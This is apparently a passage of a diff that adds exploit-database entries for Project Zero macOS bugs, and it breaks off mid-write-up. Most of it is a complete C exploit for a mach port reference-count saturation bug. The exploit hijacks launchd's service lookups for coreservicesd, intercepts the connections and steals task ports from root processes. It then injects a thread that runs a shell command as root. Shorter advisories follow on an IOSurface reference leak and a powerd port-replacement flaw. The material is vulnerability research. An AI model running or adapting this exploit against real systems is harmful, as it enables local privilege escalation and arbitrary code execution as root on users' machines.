+All processes have send rights to the bootstrap server (launchd). When they wish to lookup a service they send messages to this port.
+
+Process A and B run as the same user; A is sandboxed, B isn't. B implements a mach service and A has looked up a send right to the service vended by
+B via launchd.
+
+Process A builds a mach message with 0x10000 ool send rights to the bootstrap server and sends this message to B. B receives the message inside mach_msg_server
+(or a similar function.) When the kernel copies out this message to process B it sees that B already has a name for the boostrap port so increments the urefs count
+for that name for each ool port in the message - there are 0x10000 of those but the urefs count stops incrementing at 0xfffe (but the copy outs still succeed and
+process B sees 0x10000 copies of the same name in the received ool ports descriptor.)
+
+Process B sees that the message doesn't match its MIG schema and passes it to mach_msg_destroy, which calls mach_port_deallocate 0x10000 times, destroying the rights
+carried in the ool ports; since the bootstrap_port name only has 0xfffe urefs after the 0xfffe'th mach_port_deallocate this actually frees the boostrap_port's
+name in process B meaning that it can be reused to name another port right. The important thing to notice here is that process B still believes that the name names
+a send right to launchd (and it will just read the name from the bootstrap_port global variable.)
+
+Process A can then allocate new mach port receive rights and send another message containing send rights to these new ports to process B and try to get the old name
+reused to name one of these send rights - now when process B tries to communicate with launchd it will instead be communicating with process A.
+
+Turning this into code execution outside of the sandbox would depend on what you could transativly do by impersonating launchd in such a fashion but it's surely possible.
+
+Another approach with a more clear path to code execution would be to replace the IOKit master device port using the same technique - there's then a short path to getting
+the target's task port if it tries to open a new IOKit user client since it will pass its task port to io_service_open_extended.
+
+** poc **
+
+This PoC just demonstrates the ability to cause the boostrap port name to be freed in another process - this should be proof enough that there's a very serious bug here.
+
+Use a kernel debugger and showtaskrights to see that sharingd's name for the bootstrap port has been freed but that in userspace the bootstrap_port global is still the old name.
+
+I will work on a full exploit but it's a non-trivial task! Please reach out to me ASAP if you require any futher information about the impact of this bug.
+
+Tested on MacOS Sierra 10.12 (16A323)
+
+################################################################################
+
+Exploit attached :)
+
+The challenge to exploiting this bug is getting the exact same port name reused
+in an interesting way.
+
+This requires us to dig in a bit to exacly what a port name is, how they're allocated
+and under what circumstances they'll be reused.
+
+Mach ports are stored in a flat array of ipc_entrys:
+
+  struct ipc_entry {
+    struct ipc_object *ie_object;
+    ipc_entry_bits_t ie_bits;
+    mach_port_index_t ie_index;
+    union {
+      mach_port_index_t next;   /* next in freelist, or...  */
+      ipc_table_index_t request;  /* dead name request notify */
+    } index;
+  };
+
+mach port names are made up of two fields, the upper 24 bits are an index into the ipc_entrys table
+and the lower 8 bits are a generation number. Each time an entry in the ipc_entrys table is reused
+the generation number is incremented. There are 64 generations, so after an entry has been reallocated
+64 times it will have the same generation number.
+
+The generation number is checked in ipc_entry_lookup:
+
+  if (index <  space->is_table_size) {
+                entry = &space->is_table[index];
+    if (IE_BITS_GEN(entry->ie_bits) != MACH_PORT_GEN(name) ||
+        IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE)
+      entry = IE_NULL;    
+  }
+
+here entry is the ipc_entry struct in the kernel and name is the user-supplied mach port name.
+
+Entry allocation:
+The ipc_entry table maintains a simple LIFO free list for entries; if this list is free the table will 
+be grown. The table is never shrunk.
+
+Reliably looping mach port names:
+To exploit this bug we need a primitive that allows us to loop a mach port's generation number around.
+
+After triggering the urefs bug to free the target mach port name in the target process we immediately
+send a message with N ool ports (with send rights) and no reply port. Since the target port was the most recently
+freed it will be at the head of the freelist and will be reused to name the first of the ool ports
+contained in the message (but with an incremented generation number.)
+Since this message is not expected by the service (in this case we send an
+invalid XPC request to launchd) it will get passed to mach_msg_destroy which will pass each of 
+the ports to mach_port_deallocate freeing them in the order in which they appear in the message. Since the
+freed port was reused to name the first ool port it will be the first to be freed. This will push the name
+N entries down the freelist.
+
+We then send another 62 of these looper messages but with 2N ool ports. This has the effect of looping the generation
+number of the target port around while leaving it in approximately the middle of the freelist. The next time the target entry
+in the table is allocated it will have exactly the same mach port name as the original target right we
+triggered the urefs bug on.
+
+For this PoC I target the send right to com.apple.CoreServices.coreservicesd which launchd has.
+
+I look up the coreservicesd service in launchd then use the urefs bug to free launchd's send right and use the
+looper messages to spin the generation number round. I then register a large number of dummy services
+with launchd so that one of them reuses the same mach port name as launchd thinks the coreservicesd service has.
+
+Now when any process looks up com.apple.CoreServices.coreservicesd launchd will actually send them a send right
+to one of my dummy services :)
+
+I add all those dummy services to a portset and use that recieve right and the legitimate coreservicesd send right
+I still have to MITM all these new connections to coreservicesd. I look up a few root services which send their
+task ports to coreservices and grab these task ports in the mitm and start a new thread in the uid 0 process to run a shell command as root :)
+
+The whole flow seems to work about 50% of the time.
+*/
+
+// ianbeer
+// build: clang -o service_mitm service_mitm.c
+
+#if 0
+Exploit for the urefs saturation bug
+
+The challenge to exploiting this bug is getting the exact same port name reused
+in an interesting way.
+
+This requires us to dig in a bit to exacly what a port name is, how they're allocated
+and under what circumstances they'll be reused.
+
+Mach ports are stored in a flat array of ipc_entrys:
+
+	struct ipc_entry {
+		struct ipc_object *ie_object;
+		ipc_entry_bits_t ie_bits;
+		mach_port_index_t ie_index;
+		union {
+			mach_port_index_t next;		/* next in freelist, or...  */
+			ipc_table_index_t request;	/* dead name request notify */
+		} index;
+	};
+
+mach port names are made up of two fields, the upper 24 bits are an index into the ipc_entrys table
+and the lower 8 bits are a generation number. Each time an entry in the ipc_entrys table is reused
+the generation number is incremented. There are 64 generations, so after an entry has been reallocated
+64 times it will have the same generation number.
+
+The generation number is checked in ipc_entry_lookup:
+
+	if (index <  space->is_table_size) {
+                entry = &space->is_table[index];
+		if (IE_BITS_GEN(entry->ie_bits) != MACH_PORT_GEN(name) ||
+		    IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE)
+			entry = IE_NULL;		
+	}
+
+here entry is the ipc_entry struct in the kernel and name is the user-supplied mach port name.
+
+Entry allocation:
+The ipc_entry table maintains a simple LIFO free list for entries; if this list is free the table will 
+be grown. The table is never shrunk.
+
+Reliably looping mach port names:
+To exploit this bug we need a primitive that allows us to loop a mach port's generation number around.
+
+After triggering the urefs bug to free the target mach port name in the target process we immediately
+send a message with N ool ports (with send rights) and no reply port. Since the target port was the most recently
+freed it will be at the head of the freelist and will be reused to name the first of the ool ports
+contained in the message (but with an incremented generation number.)
+Since this message is not expected by the service (in this case we send an
+invalid XPC request to launchd) it will get passed to mach_msg_destroy which will pass each of 
+the ports to mach_port_deallocate freeing them in the order in which they appear in the message. Since the
+freed port was reused to name the first ool port it will be the first to be freed. This will push the name
+N entries down the freelist.
+
+We then send another 62 of these looper messages but with 2N ool ports. This has the effect of looping the generation
+number of the target port around while leaving it in approximately the middle of the freelist. The next time the target entry
+in the table is allocated it will have exactly the same mach port name as the original target right we
+triggered the urefs bug on.
+
+For this PoC I target the send right to com.apple.CoreServices.coreservicesd which launchd has.
+
+I look up the coreservicesd service in launchd then use the urefs bug to free launchd's send right and use the
+looper messages to spin the generation number round. I then register a large number of dummy services
+with launchd so that one of them reuses the same mach port name as launchd thinks the coreservicesd service has.
+
+Now when any process looks up com.apple.CoreServices.coreservicesd launchd will actually send them a send right
+to one of my dummy services :)
+
+I add all those dummy services to a portset and use that recieve right and the legitimate coreservicesd send right
+I still have to MITM all these new connections to coreservicesd. I look up a few root services which send their
+task ports to coreservices and grab these task ports in the mitm and start a new thread in the uid 0 process to run a shell command as root :)
+
+The whole flow seems to work about 50% of the time.
+#endif
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <libproc.h>
+#include <pthread.h>
+
+#include <servers/bootstrap.h>
+#include <mach/mach.h>
+#include <mach/mach_vm.h>
+
+void run_command(mach_port_t target_task, char* command) {
+  kern_return_t err;
+
+  size_t command_length = strlen(command) + 1;
+  size_t command_page_length = ((command_length + 0xfff) >> 12) << 12;
+  command_page_length += 1; // for the stack
+
+  // allocate some memory in the task
+  mach_vm_address_t command_addr = 0;
+  err = mach_vm_allocate(target_task,
+                         &command_addr,
+                         command_page_length,
+                         VM_FLAGS_ANYWHERE);
+
+  if (err != KERN_SUCCESS) {
+    printf("mach_vm_allocate: %s\n", mach_error_string(err));
+    return;
+  }
+
+  printf("allocated command at %llx\n", command_addr);
+  uint64_t bin_bash = command_addr;
+  uint64_t dash_c = command_addr + 0x10;
+  uint64_t cmd = command_addr + 0x20;
+  uint64_t argv = command_addr + 0x800;
+
+  uint64_t argv_contents[] = {bin_bash, dash_c, cmd, 0};
+
+  err = mach_vm_write(target_task,
+                      bin_bash,
+                      (mach_vm_offset_t)"/bin/bash",
+                      strlen("/bin/bash") + 1);
+
+  err = mach_vm_write(target_task,
+                      dash_c,
+                      (mach_vm_offset_t)"-c",
+                      strlen("-c") + 1);
+
+  err = mach_vm_write(target_task,
+                      cmd,
+                      (mach_vm_offset_t)command,
+                      strlen(command) + 1);
+
+  err = mach_vm_write(target_task,
+                      argv,
+                      (mach_vm_offset_t)argv_contents,
+                      sizeof(argv_contents));
+
+  if (err != KERN_SUCCESS) {
+    printf("mach_vm_write: %s\n", mach_error_string(err));
+    return;
+  }
+
+  // create a new thread:
+  mach_port_t new_thread = MACH_PORT_NULL;
+  x86_thread_state64_t state;
+  mach_msg_type_number_t stateCount = x86_THREAD_STATE64_COUNT;
+
+  memset(&state, 0, sizeof(state));
+
+  // the minimal register state we require:
+  state.__rip = (uint64_t)execve;
+  state.__rdi = (uint64_t)bin_bash;
+  state.__rsi = (uint64_t)argv;
+  state.__rdx = (uint64_t)0;
+
+  err = thread_create_running(target_task,
+                              x86_THREAD_STATE64,
+                              (thread_state_t)&state,
+                              stateCount,
+                              &new_thread);
+
+  if (err != KERN_SUCCESS) {
+    printf("thread_create_running: %s\n", mach_error_string(err));
+    return;
+  }
+
+  printf("done?\n");
+}
+
+
+mach_port_t lookup(char* name) {
+  mach_port_t service_port = MACH_PORT_NULL;
+  kern_return_t err = bootstrap_look_up(bootstrap_port, name, &service_port);
+  if(err != KERN_SUCCESS){
+    printf("unable to look up %s\n", name);
+    return MACH_PORT_NULL;
+  }
+  
+  if (service_port == MACH_PORT_NULL) {
+    printf("bad service port\n");
+    return MACH_PORT_NULL;
+  }
+  return service_port;
+}
+
+/*
+host_service is the service which is hosting the port we want to free (eg the bootstrap port)
+target_port is a send-right to the port we want to get free'd in the host service (eg another service port in launchd)
+*/
+
+struct ool_msg  {
+  mach_msg_header_t hdr;
+  mach_msg_body_t body;
+  mach_msg_ool_ports_descriptor_t ool_ports;
+};
+
+// this msgh_id is an XPC message
+uint32_t msgh_id_to_get_destroyed = 0x10000000;
+
+void do_free(mach_port_t host_service, mach_port_t target_port) {
+  kern_return_t err;
+
+  int port_count = 0x10000;
+  mach_port_t* ports = malloc(port_count * sizeof(mach_port_t));
+  for (int i = 0; i < port_count; i++) {
+    ports[i] = target_port;
+  }
+
+  // build the message to free the target port name
+  struct ool_msg* free_msg = malloc(sizeof(struct ool_msg));
+  memset(free_msg, 0, sizeof(struct ool_msg));
+
+  free_msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
+  free_msg->hdr.msgh_size = sizeof(struct ool_msg);
+  free_msg->hdr.msgh_remote_port = host_service;
+  free_msg->hdr.msgh_local_port = MACH_PORT_NULL;
+  free_msg->hdr.msgh_id = msgh_id_to_get_destroyed;
+
+  free_msg->body.msgh_descriptor_count = 1;
+  
+  free_msg->ool_ports.address = ports;
+  free_msg->ool_ports.count = port_count;
+  free_msg->ool_ports.deallocate = 0;
+  free_msg->ool_ports.disposition = MACH_MSG_TYPE_COPY_SEND;
+  free_msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+  free_msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY;
+
+  // send the free message
+  err = mach_msg(&free_msg->hdr,
+                 MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
+                 (mach_msg_size_t)sizeof(struct ool_msg),
+                 0,
+                 MACH_PORT_NULL,
+                 MACH_MSG_TIMEOUT_NONE,
+                 MACH_PORT_NULL); 
+  printf("free message: %s\n", mach_error_string(err));
+}
+
+void send_looper(mach_port_t service, mach_port_t* ports, uint32_t n_ports, int disposition) {
+  kern_return_t err;
+  struct ool_msg msg = {0};
+  msg.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX;
+  msg.hdr.msgh_size = sizeof(msg);
+  msg.hdr.msgh_remote_port = service;
+  msg.hdr.msgh_local_port = MACH_PORT_NULL;
+  msg.hdr.msgh_id = msgh_id_to_get_destroyed;
+
+  msg.body.msgh_descriptor_count = 1;
+
+  msg.ool_ports.address = (void*)ports;
+  msg.ool_ports.count = n_ports;
+  msg.ool_ports.disposition = disposition;
+  msg.ool_ports.deallocate = 0;
+  msg.ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+
+  err = mach_msg(&msg.hdr,
+                 MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
+                 (mach_msg_size_t)sizeof(struct ool_msg),
+                 0,
+                 MACH_PORT_NULL,
+                 MACH_MSG_TIMEOUT_NONE,
+                 MACH_PORT_NULL);
+  printf("sending looper: %s\n", mach_error_string(err));
+
+  // need to wait a little bit since we don't send a reply port and don't want to fill the queue
+  usleep(100);
+}
+
+mach_port_right_t right_fixup(mach_port_right_t in) {
+  switch (in) {
+    case MACH_MSG_TYPE_PORT_SEND:
+      return MACH_MSG_TYPE_MOVE_SEND;
+    case MACH_MSG_TYPE_PORT_SEND_ONCE:
+      return MACH_MSG_TYPE_MOVE_SEND_ONCE;
+    case MACH_MSG_TYPE_PORT_RECEIVE:
+      return MACH_MSG_TYPE_MOVE_RECEIVE;
+    default:
+      return 0; // no rights
+  }
+}
+
+int ran_command = 0;
+
+void inspect_port(mach_port_t port) {
+  pid_t pid = 0;
+  pid_for_task(port, &pid);
+  if (pid != 0) {
+    printf("got task port for pid: %d\n", pid);
+  }
+	// find the uid
+  int proc_err;
+  struct proc_bsdshortinfo info = {0};
+  proc_err = proc_pidinfo(pid, PROC_PIDT_SHORTBSDINFO, 0, &info, sizeof(info));
+  if (proc_err <= 0) {
+    // fail
+    printf("proc_pidinfo failed\n");
+    return;
+  }
+
+	if (info.pbsi_uid == 0) {
+		printf("got r00t!! ******************\n");
+    printf("(via task port for: %s)\n", info.pbsi_comm);
+	  if (!ran_command) {
+      run_command(port, "echo hello > /tmp/hello_from_root");
+      ran_command = 1;
+    }
+  }
+
+  return;
+}
+
+/*
+implements the mitm
+replacer_portset contains receive rights for all the ports we send to launchd
+to replace the real service port
+
+real_service_port is a send-right to the actual service
+
+receive messages on replacer_portset, inspect them, then fix them up and send them along
+to the real service
+*/
+void do_service_mitm(mach_port_t real_service_port, mach_port_t replacer_portset) {
+  size_t max_request_size = 0x10000;	
+	mach_msg_header_t* request = malloc(max_request_size);
+
+  for(;;) {
+    memset(request, 0, max_request_size);
+    kern_return_t err = mach_msg(request,
+                                 MACH_RCV_MSG | 
+                                 MACH_RCV_LARGE, // leave larger messages in the queue
+                                 0,
+                                 max_request_size,
+                                 replacer_portset,
+                                 0,
+                                 0);
+
+    if (err == MACH_RCV_TOO_LARGE) {
+      // bump up the buffer size
+      mach_msg_size_t new_size = request->msgh_size + 0x1000;
+      request = realloc(request, new_size);
+      // try to receive again
+      continue;
+    }
+
+    if (err != KERN_SUCCESS) {
+      printf("error receiving on port set: %s\n", mach_error_string(err));
+      exit(EXIT_FAILURE);
+    }
+
+    printf("got a request, fixing it up...\n");
+
+    // fix up the message such that it can be forwarded:
+
+    // get the rights we were sent for each port the header
+    mach_port_right_t remote = MACH_MSGH_BITS_REMOTE(request->msgh_bits);
+    mach_port_right_t voucher = MACH_MSGH_BITS_VOUCHER(request->msgh_bits);
+   
+    // fixup the header ports:
+    // swap the remote port we received into the local port we'll forward
+    // this means we're only mitm'ing in one direction - we could also
+    // intercept these replies if necessary
+    request->msgh_local_port = request->msgh_remote_port;
+    request->msgh_remote_port = real_service_port;
+    // voucher port stays the same
+
+    int is_complex = MACH_MSGH_BITS_IS_COMPLEX(request->msgh_bits);
+    
+    // (remote, local, voucher)
+    request->msgh_bits = MACH_MSGH_BITS_SET_PORTS(MACH_MSG_TYPE_COPY_SEND, right_fixup(remote), right_fixup(voucher));
+
+    if (is_complex) {
+      request->msgh_bits |= MACH_MSGH_BITS_COMPLEX;
+
+      // if it's complex we also need to fixup all the descriptors...
+      mach_msg_body_t* body = (mach_msg_body_t*)(request+1);
+      mach_msg_type_descriptor_t* desc = (mach_msg_type_descriptor_t*)(body+1);
+      for (mach_msg_size_t i = 0; i < body->msgh_descriptor_count; i++) {
+        switch (desc->type) {
+          case MACH_MSG_PORT_DESCRIPTOR: {
+            mach_msg_port_descriptor_t* port_desc = (mach_msg_port_descriptor_t*)desc;
+            inspect_port(port_desc->name);
+            port_desc->disposition = right_fixup(port_desc->disposition);
+            desc = (mach_msg_type_descriptor_t*)(port_desc+1);
+            break;
+          }
+          case MACH_MSG_OOL_DESCRIPTOR: {
+            mach_msg_ool_descriptor_t* ool_desc = (mach_msg_ool_descriptor_t*)desc;
+            // make sure that deallocate is true; we don't want to keep this memory:
+            ool_desc->deallocate = 1;
+            desc = (mach_msg_type_descriptor_t*)(ool_desc+1);
+            break;
+          }
+          case MACH_MSG_OOL_VOLATILE_DESCRIPTOR:
+          case MACH_MSG_OOL_PORTS_DESCRIPTOR: {
+            mach_msg_ool_ports_descriptor_t* ool_ports_desc = (mach_msg_ool_ports_descriptor_t*)desc;
+            // make sure that deallocate is true:
+            ool_ports_desc->deallocate = 1;
+            ool_ports_desc->disposition = right_fixup(ool_ports_desc->disposition);
+            desc = (mach_msg_type_descriptor_t*)(ool_ports_desc+1);
+            break;
+          }
+        }
+      }
+
+    }
+
+    printf("fixed up request, forwarding it\n");
+
+    // forward the message:
+    err = mach_msg(request,
+                   MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
+                   request->msgh_size,
+                   0,
+                   MACH_PORT_NULL,
+                   MACH_MSG_TIMEOUT_NONE,
+                   MACH_PORT_NULL);
+
+    if (err != KERN_SUCCESS) {
+      printf("error forwarding service message: %s\n", mach_error_string(err));
+      exit(EXIT_FAILURE);
+    }
+  }
+	
+}
+
+void lookup_and_ping_service(char* name) {
+  mach_port_t service_port = lookup(name);
+  if (service_port == MACH_PORT_NULL) {
+    printf("failed too lookup %s\n", name);
+    return;
+  }
+  // send a ping message to make sure the service actually gets launched:
+  kern_return_t err;
+  mach_msg_header_t basic_msg;
+
+  basic_msg.msgh_bits        = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
+  basic_msg.msgh_size        = sizeof(basic_msg);
+  basic_msg.msgh_remote_port = service_port;
+  basic_msg.msgh_local_port  = MACH_PORT_NULL;
+  basic_msg.msgh_reserved    = 0;
+  basic_msg.msgh_id          = 0x41414141;
+
+  err = mach_msg(&basic_msg,
+                 MACH_SEND_MSG,
+                 sizeof(basic_msg),
+                 0,
+                 MACH_PORT_NULL,
+                 MACH_MSG_TIMEOUT_NONE,
+                 MACH_PORT_NULL); 
+  if (err != KERN_SUCCESS) {
+    printf("failed to send ping message to service %s (err: %s)\n", name, mach_error_string(err));
+    return;
+  }
+
+  printf("pinged %s\n", name);
+}
+
+void* do_lookups(void* arg) {
+  lookup_and_ping_service("com.apple.storeaccountd");
+  lookup_and_ping_service("com.apple.hidfud");
+  lookup_and_ping_service("com.apple.netauth.sys.gui");
+  lookup_and_ping_service("com.apple.netauth.user.gui");
+  lookup_and_ping_service("com.apple.avbdeviced");
+  return NULL;
+}
+
+void start_root_lookups_thread() {
+  pthread_t thread;
+  pthread_create(&thread, NULL, do_lookups, NULL);
+}
+
+char* default_target_service_name = "com.apple.CoreServices.coreservicesd";
+
+int main(int argc, char** argv) {
+  char* target_service_name = default_target_service_name;
+  if (argc > 1) {
+    target_service_name = argv[1];
+  }
+
+	// allocate the receive rights which we will try to replace the service with:
+	// (we'll also use them to loop the mach port name in the target)
+	size_t n_ports = 0x1000;
+  mach_port_t* ports = calloc(sizeof(void*), n_ports);
+  for (int i = 0; i < n_ports; i++) {
+    kern_return_t err;
+    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]);
+    if (err != KERN_SUCCESS) {
+      printf("failed to allocate port: %s\n", mach_error_string(err));
+      exit(EXIT_FAILURE);
+    }
+		err = mach_port_insert_right(mach_task_self(),
+							 ports[i],
+							 ports[i],
+							 MACH_MSG_TYPE_MAKE_SEND);
+    if (err != KERN_SUCCESS) {
+      printf("failed to insert send right: %s\n", mach_error_string(err));
+      exit(EXIT_FAILURE);
+    }
+  }
+
+	// generate some service names we can use:
+	char** names = calloc(sizeof(char*), n_ports);
+  for (int i = 0; i < n_ports; i++) {
+    char name[64];
+    sprintf(name, "replacer.%d", i);
+    names[i] = strdup(name);
+  }
+
+  // lookup a send right to the target to be replaced
+  mach_port_t target_service = lookup(target_service_name);
+
+  // free the target in launchd
+  do_free(bootstrap_port, target_service);
+
+  // send one smaller looper message to push the free'd name down the free list:
+  send_looper(bootstrap_port, ports, 0x100, MACH_MSG_TYPE_MAKE_SEND);
+
+  // send the larger ones to loop the generation number whilst leaving the name in the middle of the long freelist
+  for (int i = 0; i < 62; i++) {
+    send_looper(bootstrap_port, ports, 0x200, MACH_MSG_TYPE_MAKE_SEND);
+  }
+
+	// now that the name should have looped round (and still be near the middle of the freelist
+  // try to replace it by registering a lot of new services
+  for (int i = 0; i < n_ports; i++) {
+    kern_return_t err = bootstrap_register(bootstrap_port, names[i], ports[i]);
+    if (err != KERN_SUCCESS) {
+      printf("failed to register service %d, continuing anyway...\n", i);
+    }
+  }
+
+  // add all those receive rights to a port set:
+  mach_port_t ps;
+  mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_PORT_SET, &ps);
+  for (int i = 0; i < n_ports; i++) {
+    mach_port_move_member(mach_task_self(), ports[i], ps);
+  }
+
+  start_root_lookups_thread();
+
+	do_service_mitm(target_service, ps);
+  return 0;
+}
\ No newline at end of file
diff --git a/platforms/multiple/dos/40955.txt b/platforms/multiple/dos/40955.txt
new file mode 100755
index 000000000..97bdd40fb
--- /dev/null
+++ b/platforms/multiple/dos/40955.txt
@@ -0,0 +1,17 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=930
+
+IOUserClient subclasses which override IOUserClient::externalMethod need to ensure that if they return
+kIOReturnSuccess they actually take ownership of the mach_port_t asyncWakePort if they are called via
+IOConnectCallAsyncMethod.
+
+If the userclient code doesn't take ownership of the mach port and returns a success code MIG assumes that
+they did take ownership and won't release it's reference on the port. This leads to a reference count leak.
+
+See the previous bug for more in-depth discussion.
+
+This PoC targets IOSurface which was just the first userclient I looked at; I imagine more are vulnerable.
+This PoC takes about an hour on 4 core MacBookPro to trigger the kernel UaF.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40955.zip
diff --git a/platforms/multiple/dos/40958.c b/platforms/multiple/dos/40958.c
new file mode 100755
index 000000000..94550a69d
--- /dev/null
+++ b/platforms/multiple/dos/40958.c
@@ -0,0 +1,263 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=976
+
+powerd (running as root) hosts the com.apple.PowerManagement.control mach service.
+
+It checks in with launchd to get a server port and then wraps that in a CFPort:
+
+  pmServerMachPort = _SC_CFMachPortCreateWithPort(
+                          "PowerManagement",
+                          serverPort, 
+                          mig_server_callback, 
+                          &context);
+
+It also asks to receive dead name notifications for other ports on that same server port:
+
+  mach_port_request_notification(
+              mach_task_self(),           // task
+              notify_port_in,                 // port that will die
+              MACH_NOTIFY_DEAD_NAME,      // msgid
+              1,                          // make-send count
+              CFMachPortGetPort(pmServerMachPort),        // notify port
+              MACH_MSG_TYPE_MAKE_SEND_ONCE,               // notifyPoly
+              &oldNotify);                                // previous
+
+mig_server_callback is called off of the mach port run loop source to handle new messages on pmServerMachPort:
+
+  static void
+  mig_server_callback(CFMachPortRef port, void *msg, CFIndex size, void *info)
+  {
+      mig_reply_error_t * bufRequest = msg;
+      mig_reply_error_t * bufReply = CFAllocatorAllocate(
+          NULL, _powermanagement_subsystem.maxsize, 0);
+      mach_msg_return_t   mr;
+      int                 options;
+
+      __MACH_PORT_DEBUG(true, "mig_server_callback", serverPort);
+      
+      /* we have a request message */
+      (void) pm_mig_demux(&bufRequest->Head, &bufReply->Head);
+
+This passes the raw message to pm_mig_demux:
+
+  static boolean_t 
+  pm_mig_demux(
+      mach_msg_header_t * request,
+      mach_msg_header_t * reply)
+  {
+      mach_dead_name_notification_t *deadRequest = 
+                      (mach_dead_name_notification_t *)request;
+      boolean_t processed = FALSE;
+
+      processed = powermanagement_server(request, reply);
+
+      if (processed) 
+          return true;
+      
+      if (MACH_NOTIFY_DEAD_NAME == request->msgh_id) 
+      {
+          __MACH_PORT_DEBUG(true, "pm_mig_demux: Dead name port should have 1+ send right(s)", deadRequest->not_port);
+
+          PMConnectionHandleDeadName(deadRequest->not_port);
+
+          __MACH_PORT_DEBUG(true, "pm_mig_demux: Deallocating dead name port", deadRequest->not_port);
+          mach_port_deallocate(mach_task_self(), deadRequest->not_port);
+          
+          reply->msgh_bits            = 0;
+          reply->msgh_remote_port     = MACH_PORT_NULL;
+
+          return TRUE;
+      }
+
+This passes the message to the MIG-generated code for the powermanagement subsystem, if that fails (because the msgh_id doesn't
+match the subsystem for example) then this compares the message's msgh_id field to MACH_NOTIFY_DEAD_NAME.
+
+deadRequest is the message cast to a mach_dead_name_notification_t which is defined like this in mach/notify.h:
+
+  typedef struct {
+      mach_msg_header_t   not_header;
+      NDR_record_t        NDR;
+      mach_port_name_t not_port;/* MACH_MSG_TYPE_PORT_NAME */
+      mach_msg_format_0_trailer_t trailer;
+  } mach_dead_name_notification_t;
+
+This is a simple message, not a complex one. not_port is just a completely controlled integer which in this case will get passed directly to
+mach_port_deallocate.
+
+The powerd code expects that only the kernel will send a MACH_NOTIFY_DEAD_NAME message but actually anyone can send this and force the privileged process
+to drop a reference on a controlled mach port name :)
+
+Multiplexing these two things (notifications and a mach service) onto the same port isn't possible to do safely as the kernel doesn't prevent
+user->user spoofing of notification messages - usually this wouldn't be a problem as attackers shouldn't have access to the notification port.
+
+You could use this bug to replace a mach port name in powerd (eg the bootstrap port, an IOService port etc) with a one for which the attacker holds the receieve right.
+
+Since there's still no KDK for 10.12.1 you can test this by attaching to powerd in userspace and setting a breakpoint in pm_mig_demux at the
+mach_port_deallocate call and you'll see the controlled value in rsi.
+
+Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555)
+ */
+
+// ianbeer
+
+#if 0
+MacOS/iOS arbitrary port replacement in powerd
+
+powerd (running as root) hosts the com.apple.PowerManagement.control mach service.
+
+It checks in with launchd to get a server port and then wraps that in a CFPort:
+
+	pmServerMachPort = _SC_CFMachPortCreateWithPort(
+													"PowerManagement",
+													serverPort, 
+													mig_server_callback, 
+													&context);
+
+It also asks to receive dead name notifications for other ports on that same server port:
+
+	mach_port_request_notification(
+							mach_task_self(),           // task
+							notify_port_in,                 // port that will die
+							MACH_NOTIFY_DEAD_NAME,      // msgid
+							1,                          // make-send count
+							CFMachPortGetPort(pmServerMachPort),        // notify port
+							MACH_MSG_TYPE_MAKE_SEND_ONCE,               // notifyPoly
+							&oldNotify);                                // previous
+
+mig_server_callback is called off of the mach port run loop source to handle new messages on pmServerMachPort:
+
+	static void
+	mig_server_callback(CFMachPortRef port, void *msg, CFIndex size, void *info)
+	{
+			mig_reply_error_t * bufRequest = msg;
+			mig_reply_error_t * bufReply = CFAllocatorAllocate(
+					NULL, _powermanagement_subsystem.maxsize, 0);
+			mach_msg_return_t   mr;
+			int                 options;
+
+			__MACH_PORT_DEBUG(true, "mig_server_callback", serverPort);
+			
+			/* we have a request message */
+			(void) pm_mig_demux(&bufRequest->Head, &bufReply->Head);
+
+This passes the raw message to pm_mig_demux:
+
+	static boolean_t 
+	pm_mig_demux(
+			mach_msg_header_t * request,
+			mach_msg_header_t * reply)
+	{
+			mach_dead_name_notification_t *deadRequest = 
+											(mach_dead_name_notification_t *)request;
+			boolean_t processed = FALSE;
+
+			processed = powermanagement_server(request, reply);
+
+			if (processed) 
+					return true;
+			
+			if (MACH_NOTIFY_DEAD_NAME == request->msgh_id) 
+			{
+					__MACH_PORT_DEBUG(true, "pm_mig_demux: Dead name port should have 1+ send right(s)", deadRequest->not_port);
+
+					PMConnectionHandleDeadName(deadRequest->not_port);
+
+					__MACH_PORT_DEBUG(true, "pm_mig_demux: Deallocating dead name port", deadRequest->not_port);
+					mach_port_deallocate(mach_task_self(), deadRequest->not_port);
+					
+					reply->msgh_bits            = 0;
+					reply->msgh_remote_port     = MACH_PORT_NULL;
+
+					return TRUE;
+			}
+
+This passes the message to the MIG-generated code for the powermanagement subsystem, if that fails (because the msgh_id doesn't
+match the subsystem for example) then this compares the message's msgh_id field to MACH_NOTIFY_DEAD_NAME.
+
+deadRequest is the message cast to a mach_dead_name_notification_t which is defined like this in mach/notify.h:
+
+	typedef struct {
+			mach_msg_header_t   not_header;
+			NDR_record_t        NDR;
+			mach_port_name_t not_port;/* MACH_MSG_TYPE_PORT_NAME */
+			mach_msg_format_0_trailer_t trailer;
+	} mach_dead_name_notification_t;
+
+This is a simple message, not a complex one. not_port is just a completely controlled integer which in this case will get passed directly to
+mach_port_deallocate.
+
+The powerd code expects that only the kernel will send a MACH_NOTIFY_DEAD_NAME message but actually anyone can send this and force the privileged process
+to drop a reference on a controlled mach port name :)
+
+Multiplexing these two things (notifications and a mach service) onto the same port isn't possible to do safely as the kernel doesn't prevent
+user->user spoofing of notification messages - usually this wouldn't be a problem as attackers shouldn't have access to the notification port.
+
